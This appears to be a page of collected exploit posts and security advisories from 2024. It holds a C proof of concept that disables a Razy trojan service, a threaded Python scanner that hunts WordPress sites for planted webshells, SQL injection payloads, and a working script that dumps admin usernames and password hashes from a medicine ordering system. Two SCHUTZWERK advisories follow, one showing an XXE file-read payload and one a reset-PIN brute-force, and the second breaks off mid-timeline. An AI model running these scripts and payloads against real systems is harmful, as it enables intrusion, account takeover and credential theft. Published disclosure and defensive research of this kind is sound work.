<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/0eb4a9089d3f7cf431d6547db3b9484d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.Razy.abc<br />Vulnerability: Insecure Permissions (In memory IPC)<br />Family: Razy<br />Type: PE32<br />MD5: 0eb4a9089d3f7cf431d6547db3b9484d<br />SHA256: 3d82fee314e7febb8307ccf8a7396b6dd53c7d979a74aa56f3c4a6d0702fd098 <br />Vuln ID: MVID-2024-0678<br />Dropped files: performer.exe<br />Disclosure: 04/07/2024<br />Description: The trojan installs a service under "C:\Program Files (x86)\SmartData" and runs with SYSTEM integrity. Terminating the malware service would typically require high integrity user privileges. However, standard low integrity users can successfully terminate it by exploiting insecure Win32 in memory event objects "esnm" or "epp". Since no permissions are set on these IPC objects a low integrity user can set the DACL to deny access for the everyone user group, then set and reset the event to cause the malware to terminate. Interestingly, I used same technique to defeat RSA's EDR agent "netwitness" CVE-2022-47529.<br /><br />PE file "performer.exe" is ran using rundll32 RunHTMLApplication.<br /><br />Win32 API Event objects.<br />performer.exe creates Event \BaseNamedObjects\epp ===> with no permissions set<br />svchost_ms.exe creates Event \BaseNamedObjects\esnm ===> with no permissions set<br /><br />Exploit/PoC:<br />"Trojan_Razy_Exploit.c"<br /><br />#include "windows.h"<br />#include "stdio.h"<br />#include "accctrl.h"<br />#include "aclapi.h"<br />#define OPEN_ALL_ACCESS 0x1F0003<br /><br />/*<br />John Page (aka hyp3rlinx) - circa April of 2024 Malvuln project<br />Incorrect in-memory Win32 API access control allows termination of the malware service by a standard user.<br />Trojan.Win32.Razy.abc<br />MD5: 0eb4a9089d3f7cf431d6547db3b9484d<br />*/<br /><br />char Vuln_Events[][32] = {"Global\\esnm", "Global\\epp"};<br />BOOL PWNED=FALSE;<br /><br />int main(void){<br /> <br /> PACL pOldDACL = NULL;<br /> PACL pNewDACL = NULL;<br /> int i=0;<br /> <br /> for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){<br /> HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]);<br /> <br />if (hEvent != INVALID_HANDLE_VALUE){<br /> if(!PWNED){<br /> printf("[+] Exploiting Trojan Razy Event: %s\n", Vuln_Events[i]);<br /> }<br /> <br /> if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){<br /> TRUSTEE trustee[1];<br /> trustee[0].TrusteeForm = TRUSTEE_IS_NAME;<br /> trustee[0].TrusteeType = TRUSTEE_IS_GROUP;<br /> trustee[0].ptstrName = TEXT("Everyone"); <br /> trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;<br /> trustee[0].pMultipleTrustee = NULL;<br /><br /> EXPLICIT_ACCESS explicit_access_list[1];<br /> ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));<br /><br /> explicit_access_list[0].grfAccessMode = DENY_ACCESS; <br /> explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;<br /> explicit_access_list[0].grfInheritance = NO_INHERITANCE;<br /> explicit_access_list[0].Trustee = trustee[0];<br /> <br /> if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){<br /> printf("%d", GetLastError());<br /> }<br /> <br /> if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ <br /> printf("%d", GetLastError()); <br /> }else{<br /> PWNED=TRUE;<br /> SetEvent(hEvent);<br /> Sleep(1000);<br /> ResetEvent(hEvent);<br /> CloseHandle(hEvent);<br /> Sleep(1000);<br /> }<br /> LocalFree(pNewDACL);<br /> LocalFree(pOldDACL);<br /> CloseHandle(hEvent);<br /> Sleep(1000);<br /> }<br /> } <br />}<br />if(PWNED){<br /> printf("[+] Trojan.Win32.Razy.abc / MD5: 0eb4a9089d3f7cf431d6547db3b9484d PWNED!\n");<br /> PWNED=FALSE;<br />}<br />printf("[+] By malvuln... Done!\n");<br />system("pause");<br />return 666;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path Privilege<br />Escalation<br /># Date: 2024-04-01<br /># Exploit Author: Milad Karimi (Ex3ptionaL)<br /># Contact: miladgrayhat@gmail.com<br /># Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL<br /># Vendor Homepage: http://anydesk.com<br /># Software Link: http://anydesk.com/download<br /># Version: Software Version 7.0.15<br /># Tested on: Windows 10 Pro x64<br /><br />1. Description:<br /><br />The Anydesk installs as a service with an unquoted service path running<br />with SYSTEM privileges.<br />This could potentially allow an authorized but non-privileged local<br />user to execute arbitrary code with elevated privileges on the system.<br /><br />2. Proof<br /><br />C:\>sc qc anydesk<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: anydesk<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"<br />--service<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : AnyDesk Service<br /> DEPENDENCIES : RpcSs<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />C:\>systeminfo<br /><br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19045 N/A Build 19045<br />OS Manufacturer: Microsoft Corporation<br /></code></pre>
<pre><code># Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload<br /># Date: 2024-04-01<br /># Author: Milad Karimi (Ex3ptionaL)<br /># Category : webapps<br /># Tested on: windows 10 , firefox<br /><br />import sys<br />import os.path<br />import requests<br />import re<br />import urllib3<br />from requests.exceptions import SSLError<br />from multiprocessing.dummy import Pool as ThreadPool<br />from colorama import Fore, init<br />init(autoreset=True)<br />error_color = Fore.RED<br />info_color = Fore.CYAN<br />success_color = Fore.GREEN<br />highlight_color = Fore.MAGENTA<br />requests.urllib3.disable_warnings()<br />headers = {<br /> 'Connection': 'keep-alive',<br /> 'Cache-Control': 'max-age=0',<br /> 'Upgrade-Insecure-Requests': '1',<br /> 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;<br />wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107<br />Mobile Safari/537.36',<br /> 'Accept':<br />'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',<br /><br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',<br /> 'Referer': 'www.google.com'<br />}<br />def URLdomain(url):<br /> if url.startswith("http://"):<br /> url = url.replace("http://", "")<br /> elif url.startswith("https://"):<br /> url = url.replace("https://", "")<br /> if '/' in url:<br /> url = url.split('/')[0]<br /> return url<br />def check_security(url):<br /> fg = success_color<br /> fr = error_color<br /> try:<br /> url = 'http://' + URLdomain(url)<br /> check = requests.get(url +<br />'/wp-content/themes/travelscape/json.php', headers=headers,<br />allow_redirects=True, timeout=15)<br /> if 'MSQ_403' in check.text:<br /> print(' -| ' + url + ' --> {}[Successfully]'.format(fg))<br /> open('MSQ_403.txt', 'a').write(url +<br />'/wp-content/themes/travelscape/json.php\n')<br /> else:<br /> url = 'https://' + URLdomain(url)<br /> check = requests.get(url +<br />'/wp-content/themes/aahana/json.php', headers=headers,<br />allow_redirects=True, verify=False, timeout=15)<br /> if 'MSQ_403' in check.text:<br /> print(' -| ' + url + ' --> {}[Successfully]'.format(fg))<br /> open('MSQ_403.txt', 'a').write(url +<br />'/wp-content/themes/aahana/json.php\n')<br /> else:<br /> print(' -| ' + url + ' --> {}[Failed]'.format(fr))<br /> check = requests.get(url + '/wp-content/themes/travel/issue.php',<br />headers=headers, allow_redirects=True, timeout=15)<br /> if 'Yanz Webshell!' in check.text:<br /> print(' -| ' + url + ' --> {}[Successfully]'.format(fg))<br /> open('wso.txt', 'a').write(url +<br />'/wp-content/themes/travel/issue.php\n')<br /> else:<br /> url = 'https://' + URLdomain(url)<br /> check = requests.get(url + '/about.php', headers=headers,<br />allow_redirects=True, timeout=15)<br /> if 'Yanz Webshell!' in check.text:<br /> print(' -| ' + url + ' --> {}[Successfully]'.format(fg))<br /> open('wso.txt', 'a').write(url + '/about.php\n')<br /> else:<br /> url = 'https://' + URLdomain(url)<br /> check = requests.get(url +<br />'/wp-content/themes/digital-download/new.php', headers=headers,<br />allow_redirects=True, timeout=15)<br /> if '#0x2525' in check.text:<br /> print(' -| ' + url + ' --> {}[Successfully]'.format(fg))<br /> open('digital-download.txt', 'a').write(url +<br />'/wp-content/themes/digital-download/new.php\n')<br /> else:<br /> print(' -| ' + url + ' --> {}[Failed]'.format(fr))<br /> url = 'http://' + URLdomain(url)<br /> check = requests.get(url + '/epinyins.php', headers=headers,<br />allow_redirects=True, timeout=15)<br /> if 'Uname:' in check.text:<br /> print(' -| ' + url + ' --> {}[Successfully]'.format(fg))<br /> open('wso.txt', 'a').write(url + '/epinyins.php\n')<br /> else:<br /> print(' -| ' + url + ' --> {}[Failed]'.format(fr))<br /> url = 'https://' + URLdomain(url)<br /> check = requests.get(url + '/wp-admin/dropdown.php',<br />headers=headers, allow_redirects=True, verify=False, timeout=15)<br /> if 'Uname:' in check.text:<br /> print(' -| ' + url + ' --> {}[Successfully]'.format(fg))<br /> open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')<br /> else:<br /> url = 'https://' + URLdomain(url)<br /> check = requests.get(url +<br />'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,<br />allow_redirects=True, verify=False, timeout=15)<br /> if 'Simple Shell' in check.text:<br /> print(' -| ' + url + ' --> {}[Successfully]'.format(fg))<br /> open('dummyyummy.txt', 'a').write(url +<br />'/wp-content/plugins/dummyyummy/wp-signup.php\n')<br /> else:<br /> print(' -| ' + url + ' --> {}[Failed]'.format(fr))<br /> except Exception as e:<br /> print(f' -| {url} --> {fr}[Failed] due to: {e}')<br />def main():<br /> try:<br /> url_file_path = sys.argv[1]<br /> except IndexError:<br /> url_file_path = input(f"{info_color}Enter the path to the file<br />containing URLs: ")<br /> if not os.path.isfile(url_file_path):<br /> print(f"{error_color}[ERROR] The specified file path is<br />invalid.")<br /> sys.exit(1)<br /> try:<br /> urls_to_check = [line.strip() for line in open(url_file_path, 'r',<br />encoding='utf-8').readlines()]<br /> except Exception as e:<br /> print(f"{error_color}[ERROR] An error occurred while reading the<br />file: {e}")<br /> sys.exit(1)<br /> pool = ThreadPool(20)<br /> pool.map(check_security, urls_to_check)<br /> pool.close()<br /> pool.join()<br /> print(f"{info_color}Security check process completed successfully.<br />Results are saved in corresponding files.")<br />if __name__ == "__main__":<br /> main()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi<br /># Date: February 25th, 2024<br /># Exploit Author: Stefan Hesselman<br /># Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/<br /># Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip<br /># Version: 1.0<br /># Tested on: Kali Linux<br /># CVE: N/A<br /># CWE: CWE-89, CWE-74<br /><br />## Description<br />Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker <br />can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database.<br /><br />## Vulnerable endpoint:<br />http://example.com/Daily-Expense-Manager/readxp.php?term=asd<br /><br />## Vulnerable HTTP parameter:<br />term (GET)<br /><br />## Exploit proof-of-concept:<br />http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20-<br /><br />## Vulnerable PHP code:<br />File: /Daily-Expense-Manager/readxp.php, Lines: 16-23<br /><?php<br />[...]<br />//get search term<br />$searchTerm = $_GET['term']; # unsanitized and under control of the attacker.<br />//get matched data from skills table<br />$query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname");<br />while ($row = $query->fetch_assoc()) {<br /> $data[] = $row['pname'];<br />}<br />//return json data<br />echo json_encode($data);<br />?><br /><br /></code></pre>
<pre><code># Exploit Title : Open Source Medicine Ordering System v1.0 - SQLi<br /># Author : Onur Karasalihoğlu<br /># Date : 27/02/2024<br /># Sample Usage<br /><br />% python3 omos_sqli_exploit.py https://target.com<br />Available Databases:<br />1. information_schema<br />2. omosdb<br />Please select a database to use (enter number): 2<br />You selected: omosdb<br />Extracted Admin Users Data:<br />1 | Adminstrator | Admin | | 0192023a7bbd73250516f069df18b500 | admin<br />2 | John | Smith | D | 1254737c076cf867dc53d60a0364f38e | jsmith<br />'''<br /><br />import requests<br />import re<br />import sys<br /><br />def fetch_database_names(domain):<br /> url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',schema_name)),'enforsec')%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-"<br /> <br /> try:<br /> # HTTP request<br /> response = requests.get(url)<br /> response.raise_for_status() # exception for 4xx and 5xx requests<br /> <br /> # data extraction<br /> pattern = re.compile(r'enforsec\["(.*?)"\]enforsec')<br /> extracted_data = pattern.search(response.text)<br /> if extracted_data:<br /> databases = extracted_data.group(1).split(',')<br /> databases = [db.replace('"', '') for db in databases]<br /> print("Available Databases:")<br /> for i, db in enumerate(databases, start=1):<br /> print(f"{i}. {db}")<br /> <br /> # users should select omos database<br /> choice = int(input("Please select a database to use (enter number): "))<br /> if 0 < choice <= len(databases):<br /> selected_db = databases[choice - 1]<br /> print(f"You selected: {selected_db}")<br /> fetch_data(domain, selected_db)<br /> else:<br /> print("Invalid selection.")<br /> else:<br /> print("No data extracted.")<br /> except requests.RequestException as e:<br /> print(f"HTTP Request failed: {e}")<br /><br />def fetch_data(domain, database_name):<br /> url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',`type`,firstname,lastname,middlename,password,username)),'enforsec') FROM {database_name}.users-- -"<br /> <br /> try:<br /> # HTTP request<br /> response = requests.get(url)<br /> response.raise_for_status() # exception for 4xx and 5xx requests<br /> <br /> # data extraction<br /> pattern = re.compile(r'enforsec\[(.*?)\]enforsec')<br /> extracted_data = pattern.search(response.text)<br /> if extracted_data:<br /> print("Extracted Admin Users Data:")<br /> data = extracted_data.group(1)<br /> rows = data.split('","')<br /> for row in rows:<br /> clean_row = row.replace('"', '')<br /> user_details = clean_row.split(',')<br /> print(" | ".join(user_details))<br /> else:<br /> print("No data extracted.")<br /> except requests.RequestException as e:<br /> print(f"HTTP Request failed: {e}")<br /><br />def main():<br /> if len(sys.argv) != 2:<br /> print("Usage: python3 omos_sqli_exploit.py <domain>")<br /> sys.exit(1)<br /><br /> fetch_database_names(sys.argv[1])<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Title<br />=====<br /><br />SCHUTZWERK-SA-2023-006: Arbitrary File Read via XML External Entities in <br />Visual Planning<br /><br />Status<br />======<br /><br />PUBLISHED<br /><br />Version<br />=======<br /><br />1.0<br /><br />CVE reference<br />=============<br /><br />CVE-2023-49234<br /><br />Link<br />====<br /><br />https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-006/<br /><br />Text-only version:<br />https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-006.txt<br /><br />Affected products/vendor<br />========================<br /><br />All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.<br /><br />Summary<br />=======<br /><br />Authenticated attackers can exploit a weakness in the XML parser <br />functionality of the Visual Planning[0] application in order to obtain <br />read access to arbitrary files on the application server. Depending on <br />configured access permissions, this vulnerability could be used by an <br />attacker to exfiltrate secrets stored on the local file system.<br /><br />Risk<br />====<br /><br />An attacker can use the vulnerability to gather information and <br />depending on the stored data, exfiltrate secrets from the file system. <br />Furthermore, HTTP requests can be used for out-of-bands exfiltration and <br />possibly server side request forgery (SSRF) attacks.<br /><br />Description<br />===========<br /><br />During a recent red teaming assessment, Visual Planning was identified <br />as part of the customers internet-facing assets. The software is <br />developed by STILOG I.S.T. and provides resource management and <br />scheduling features. A security assessment conducted by SCHUTZWERK found <br />an arbitrary file read vulnerability via XML external entities in Visual <br />Planning.<br />The application Admin Center (vpadmin) communicates with the server <br />through an XML-based protocol that utilizes proprietary compression <br />methods and is transmitted via HTTP. SCHUTZWERK implemented a custom <br />proxy as part of an assessment in order to intercept and manipulate the <br />messages exchanged between application and server.<br /><br />One of the messages sent by the Admin Center application after <br />authentication is the following:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.parameters.GetApplicationProperty><br /><defaultValue><br /><br /></defaultValue><br /><propertyName>PWD</propertyName><br /><rawResult>false</rawResult><br /><section>INSTALLDATA</section><br /><userSession isNull="true"/><br /></com.visualplanning.query.parameters.GetApplicationProperty><br /><br />The method GetApplicationProperty is called to request the value of the <br />property PWD. The server responds with an XML message, where the value <br />element contains the response of the query:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.result.ApplicationPropertyResult><br /><resultValues/><br /><status>OK</status><br /><value><br /><br /></value><br /></com.visualplanning.query.result.ApplicationPropertyResult><br /><br />In this response it was observed that if the requested property value <br />could not be resolved, the content of the request element defaultValue <br />will be reflected as part of the response, making it a suitable back <br />channel for XML external entity (XXE) injections.<br /><br />The following message was sent to the Visual Planning application:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><!DOCTYPE foo [<!ENTITY example SYSTEM <br />"C:\xampp2\tomcat\webapps\vplanning\configuration\install.properties"> ]><br /><com.visualplanning.query.parameters.GetApplicationProperty><br /><defaultValue>&example;</defaultValue><br /><propertyName>ShowBackground</propertyName><br /><rawResult>false</rawResult><br /><section>Application</section><br /><userSession isNull="true"/><br /></com.visualplanning.query.parameters.GetApplicationProperty><br /><br />The server responds with the content of the requested install.properties <br />file inside the value element, thus confirming the XML parser is <br />vulnerable to XML external entity (XXE) injections:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.result.ApplicationPropertyResult><br /><resultValues/><br /><status>OK</status><br /><value>#<br />#Tue Oct 03 15:37:33 CEST 2023<br />INSTALLDATA.INSTALLSERIAL=<br />INSTALLDATA.INSTALLURL=http\://127.0.0.1\:8080/vplanning<br />INSTALLDATA.OK=Next<br />INSTALLDATA.PAGE=PROVIDER<br />INSTALLDATA.POOLMODE=1<br />INSTALLDATA.PORT=3306<br />INSTALLDATA.PROVIDERTYPE=MySQL<br />INSTALLDATA.PWD=ENCODE\:<br />INSTALLDATA.SERVER=127.0.0.1<br />INSTALLDATA.SERVERLANG=de<br />INSTALLDATA.USER=root<br />INSTALLDATA.VIEWERSERIAL=<br /></value><br /></com.visualplanning.query.result.ApplicationPropertyResult><br /><br />Further testing showed that out-of-bands exfiltration via HTTPS requests <br />is also generally possible.<br /><br />Solution/Mitigation<br />===================<br /><br />The vendor suggests to update to Visual Planning 8 (Build 240207)<br /><br />Disclosure timeline<br />===================<br /><br />2023-11-01: Vulnerability discovered<br />2023-11-09: Contact vendor in order to determine security contact<br />2023-11-10: Received generic sales response from vendor<br />2023-11-14: Contacted CTO of vendor directly<br />2023-11-16: Vulnerabilities demonstrated in call with contact at vendor<br />2023-11-24: CVE assigned by Mitre<br />2023-11-24: Additional technical details provided to vendor<br />2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings <br />is in progress<br />2024-01-30: Inquired about mitigation status regarding the reported <br />vulnerabilities<br />2024-01-30: Vendor informed SCHUTZWERK that some of the issues were <br />already fixed<br />2024-03-08: Sent advisory drafts to vendor<br />2024-03-28: Received patch information and release of advisory<br /><br />Contact/Credits<br />===============<br /><br />The vulnerability was discovered during an assessment by Lennert Preuth <br />and David Brown of SCHUTZWERK GmbH.<br /><br />References<br />==========<br /><br />[0] https://www.visual-planning.com/en/<br /><br />Disclaimer<br />==========<br /><br />The information provided in this security advisory is provided "as is" <br />and without warranty of any kind. Details of this security advisory may <br />be updated in order to provide as accurate information as possible. The <br />most recent version of this security advisory can be found at SCHUTZWERK <br />GmbH's website ( https://www.schutzwerk.com ).<br /><br />Additional information<br />======================<br /><br />SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/<br /><br />SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0bcaHGFkdmlzb3Jp<br />ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsdwA/+MyfbZTe36+AYi9q6GJE6<br />S75Xm2aZtEM3NC5F6aMcELqFEW7LNjERmBoqfkHe+SWfgFxeCXl/XelHaNnR7HTM<br />ZZPCGwJmOI+XaraInPVdCDw1QVIdiCG4VZzE0tlnFbLBgM+OTOxcDOoG7OhzP6mm<br />ALfankzxu3AfbZhwebQtSXIQ+YqjitTsvjQGPleylqYK5CJbChsyvmMjomu/GzdO<br />sWQ25ODCVUy6VORet8yn5OkQnM2CjSkteuTdNxCzd6JUB+vQ0g5FCE5NVzkqYq21<br />YJ4Fc3PgkyAnrGefSbueL+Z/K6btM8RysJAwGahIEOdlkG8W/p09L0QQUGERT2VN<br />UO6oTi/1OyoJBV9L5umr6aHss3P92ln90UAUW2dlZOdGSB8rlXisxLC1wtFZAXH9<br />YwiGY/ACXmV1FtQQpgFxfNRyEWaltU5S0Y0bPAaW+ABSMLlK4X0Ft9E/4s4Yel2d<br />TGngEnVKcR/PKNtrJbBqPDwt98R0MdQi0QxBRaxGxAg4Yr1qex8ph6IRT7bDTm0/<br />1CKlQL7y9uvXlnFE4CO3IkKNp0ejKn3A7QEep4jit07VItIc+sRsoMnB6v54DoML<br />ZfIisDoijb3doTNieyMpgTGZTDWLwLO36IS9JiqafNCAnngExqylFX6vYQVggtRz<br />mZ2yA2/9ZfQwOawEirQtQr8=<br />=TUGM<br />-----END PGP SIGNATURE-----<br /><br />-- <br />SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany<br />Zertifiziert / Certified ISO 27001, 9001 and TISAX<br /><br />Phone +49 731 977 191 0<br /><br />advisories@schutzwerk.com / www.schutzwerk.com<br /><br />Geschäftsführer / Managing Directors:<br />Jakob Pietzka, Michael Schäfer<br /><br />Amtsgericht Ulm / HRB 727391<br />Datenschutz / Data Protection www.schutzwerk.com/datenschutz<br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Title<br />=====<br /><br />SCHUTZWERK-SA-2023-004: Authentication Bypass via Password Reset <br />Functionality in Visual Planning<br /><br />Status<br />======<br /><br />PUBLISHED<br /><br />Version<br />=======<br /><br />1.0<br /><br />CVE reference<br />=============<br /><br />CVE-2023-49232<br /><br />Link<br />====<br /><br />https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-004/<br /><br />Text-only version:<br />https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-004.txt<br /><br />Affected products/vendor<br />========================<br /><br />All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.<br /><br />Summary<br />=======<br /><br />Unauthenticated attackers can exploit a weakness in the password reset <br />functionality of the Visual Planning[0] application in order to obtain <br />access to arbitrary user accounts including administrators. In case <br />administrative (in the context of Visual Planning) accounts are <br />compromised, attackers can install malicious modules into the <br />application to take over the application server hosting the Visual <br />Planning application.<br /><br />Risk<br />====<br /><br />The application does not impose any limits on the number of guesses that <br />can be made. Attackers can therefore initiate the reset for arbitrary <br />users and automate the pin validation process until a valid pin is <br />obtained. The vulnerability allows unauthenticated attackers to gain <br />access to arbitrary user accounts including administrators.<br /><br />Failed pin validation attempts are not logged by the application which <br />greatly increases the difficulty of detecting ongoing attacks.<br /><br />With administrative access to Admin Center, attackers can install <br />malicious modules containing Java code that is executed on the <br />application server, resulting in arbitrary command execution.<br /><br />The entire pin space can be enumerated in approximately one to two hours.<br /><br />Description<br />===========<br /><br />During a recent red teaming assessment, Visual Planning was identified <br />as part of the customers internet-facing assets. The software is <br />developed by STILOG I.S.T. and provides resource management and <br />scheduling features. A security assessment conducted by SCHUTZWERK found <br />an authentication bypass in Visual Planning's password reset functionality.<br />The application Admin Center (vpadmin) communicates with the server <br />through an XML-based protocol that utilizes proprietary compression <br />methods and is transmitted via HTTP. SCHUTZWERK implemented a custom <br />proxy as part of an assessment in order to intercept and manipulate the <br />messages exchanged between application and server.<br /><br />One of the first messages sent by the Admin Center application after <br />launch is the following:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.NamedMethodParameter><br /><methodName>canResetPassword</methodName><br /><rawResult>false</rawResult><br /><userSession isNull="true"/><br /><values/><br /></com.visualplanning.query.NamedMethodParameter><br /><br />In this request, the client asks the server whether it should display <br />the "Forgot your password ?" button as part of the login form. During <br />the assessment, the server responded as follows:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.QueryResult><br /><resultValues><br /><HashtableValue><br /><key>resetPassword</key><br /><value class="java.lang.Boolean">false</value><br /></HashtableValue><br /></resultValues><br /><status>OK</status><br /></com.visualplanning.query.QueryResult><br /><br />By altering the value to "true", the password reset functionality <br />becomes accessible in the application. At this point, attackers can <br />provide the target username. This causes a request similar to the <br />following to be issued:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.NamedMethodParameter><br /><methodName>sendResetPasswwd</methodName><br /><rawResult>false</rawResult><br /><userSession isNull="true"/><br /><values><br /><HashtableValue><br /><key>login</key><br /><value class="String">admin</value><br /></HashtableValue><br /></values><br /></com.visualplanning.query.NamedMethodParameter><br /><br />While handling this request, the server generates a five digit numeric <br />pin and tries to send it to the email address associated with the <br />provided username. Regardless of whether the email could be successfully <br />transmitted, the generated pin is stored in a attribute of the session <br />used while performing the reset. It should be noted that the password <br />reset request message can be sent directly without enabling the button <br />in the GUI if the message format is already known.<br /><br />To complete the reset process, the correct pin (matching the pin stored <br />in the session attribute) must be specified. A message similar to the <br />following is issued by the application to validiate the provided pin:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.NamedMethodParameter><br /><methodName>validateResetPasswwd</methodName><br /><rawResult>false</rawResult><br /><userSession isNull="true"/><br /><values><br /><HashtableValue><br /><key>login</key><br /><value class="String">admin</value><br /></HashtableValue><br /><HashtableValue><br /><key>userCode</key><br /><value class="String">58344</value><br /></HashtableValue><br /></values><br /></com.visualplanning.query.NamedMethodParameter><br /><br />When an invalid pin is provided, the server responds with the following <br />XML document:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.QueryResult><br /><resultValues><br /><HashtableValue><br /><key>ERROR</key><br /><value class="String">Invalid code.</value><br /></HashtableValue><br /></resultValues><br /><status>KO</status><br /></com.visualplanning.query.QueryResult><br /><br />In case the pin is valid, the server responds with a VPUser data <br />structure similar to the following:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.QueryResult><br /><resultValues><br /><HashtableValue><br /><key>vpUser</key><br /><value class="com.visualplanning.data.admin.VPUser"><br /><ID>1</ID><br /><UID>C442-53EB-B185-8804-F6BF-70AC-61C3-31BC</UID><br /><activated>true</activated><br /><comments>Super administrateur</comments><br /><email>yahd6Coo@schutzwerk.com</email><br /><expiredPasswd>false</expiredPasswd><br /><groups/><br /><imageProfilBase64></imageProfilBase64><br /><ldapSetting><br /><entityID>-1</entityID><br /></ldapSetting><br /><licenses/><br /><loginAttemps>0</loginAttemps><br /><mobilePhoneNumber></mobilePhoneNumber><br /><name>admin</name><br /><ownerID>0</ownerID><br /><phoneNumber></phoneNumber><br /><platform>VP</platform><br /><resetPasswd>true</resetPasswd><br /><resourceUser>false</resourceUser><br /></value><br /></HashtableValue><br /></resultValues><br /><status>OK</status><br /></com.visualplanning.query.QueryResult><br /><br />In addition, an empty password is set for the target username. Upon <br />first login after reset, a new password must be set for this user.<br /><br />Solution/Mitigation<br />===================<br /><br />The vendor suggests to update to Visual Planning 8 (Build 240207)<br /><br />Disclosure timeline<br />===================<br /><br />2023-11-01: Vulnerability discovered<br />2023-11-09: Contact vendor in order to determine security contact<br />2023-11-10: Received generic sales response from vendor<br />2023-11-14: Contacted CTO of vendor directly<br />2023-11-16: Vulnerabilities demonstrated in call with contact at vendor<br />2023-11-24: CVE assigned by Mitre<br 